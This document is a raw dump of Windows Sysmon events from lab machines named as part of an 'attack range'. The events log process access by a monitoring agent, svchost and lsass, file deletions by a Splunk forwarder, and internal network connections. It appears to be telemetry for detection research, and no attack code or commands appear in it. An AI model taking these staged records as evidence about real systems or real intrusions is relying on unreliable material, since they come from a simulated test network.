Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.844{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.773{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.761{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.242{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.241{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.199{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.199{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.199{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.187{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017287Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:55.683{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64AEA2F92154FE8977B94029A8C8A284,SHA256=AFFEC9AD45B8B9F8955E29FF58F96A97A7062E1160606500884B7F2D0D03799A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:55.898{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD3BF3E7BD6C5B257C1A966F6BDBF681,SHA256=6F810CBCB30E94789E79FF6C23D0A1AEFAC9A393BD448ACBB4EF124C1E76677E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:55.009{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED68E72AF928E13F742797188E73DB32,SHA256=F5DF7B6A7A021B32BDB1BDF68855FE8338118D222B60A6107F1E069946E036EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017289Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:55.099{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50130-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017288Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:56.769{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5929D295199537C95497190EB3F79813,SHA256=CDDC6C1D69E518E371977D879237520C9547CCF00A61E478CACF5CE5BB0E00B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.341{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56399-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.341{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56399-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:53.498{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56398-false10.0.1.12-8000- 23542300x800000000000000044728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:56.013{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D2B8D1CA2196398E27F2280C05A9269,SHA256=382C4AFB8DFE7AA4692297D085C94A9050C6142C6F2892AB1BFFBA0F98D03BF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017290Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:57.854{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9D9F19CD8C3FEDE965E32FCF8CC92B1,SHA256=D2A1ED5AFA7730E91A1460E6319E2803B406B707DEBF807234EEE9BD676E5B01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:57.062{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C86A52FA90B8D926789C4B149EA067F,SHA256=44320A4411E29E2ADE148B36CC553CF7E53770EF392152AC731EAC751CD9DB43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017291Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:58.946{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0796145148256D97B6B662037521515,SHA256=0756E99B2ADD18081D12C839BDE132BB51B03CDC873B54BC6DFA41E770C221FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:58.100{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05CEF89364128B34C2F7B404260385BC,SHA256=CB9E18B5EED5D27D7F9A6DD70B0DFEF17C39B879A3927A7C01540364A36C6589,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 